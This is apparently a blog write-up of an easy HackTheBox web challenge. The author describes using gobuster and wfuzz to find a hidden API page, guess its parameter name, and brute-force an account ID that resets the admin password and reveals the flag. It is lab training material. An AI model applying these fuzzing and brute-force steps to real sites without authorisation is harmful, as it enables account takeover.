Description:
This is an easy web challenge from HackTheBox says that we should get the admin password.
From the challenge name we can guess that this challenge related to web fuzzing!
I started the Instance and i visited the challenge page and i found not interesting information.
Then i used gobuster tool to brute-force directories and files
I found a directory called /api with 301 response so, i used gobuster again to find out if there are files in /api and i identified the extension as php
Bingo! i found a page called /action.php with 200 response!
I visited that page and i found an error said
That error says that the parameter not set so, the action.php should take a parameter but we don’t know what it is? but we can brute force it!
I intercepted the request with burp to get the essential information that can help me.
I used wfuzz tool to fuzz the parameter name and i filtered the responses with the content-length
As we see, the parameter name that i found called reset.
I used this parameter again but i got a different error says that the account id not found! so, we should try to fuzz the account id and get the right one.
I used wfuzz tool again but this time to brute-force the value of the reset parameter and i used the big.txt wordlist “you can fiend it on the dirb directory”.
And Voila! we get the value of the right account, now we can reset the password of the account that has 20 value as ID.
I sent the value and the parameter name to the site “action.php?reset=20” and i got that request that contained the flag!
Finally, Thank you and i hope you learned something new!
For any questions, you can find me on:
MagMadiat 
Leave a comment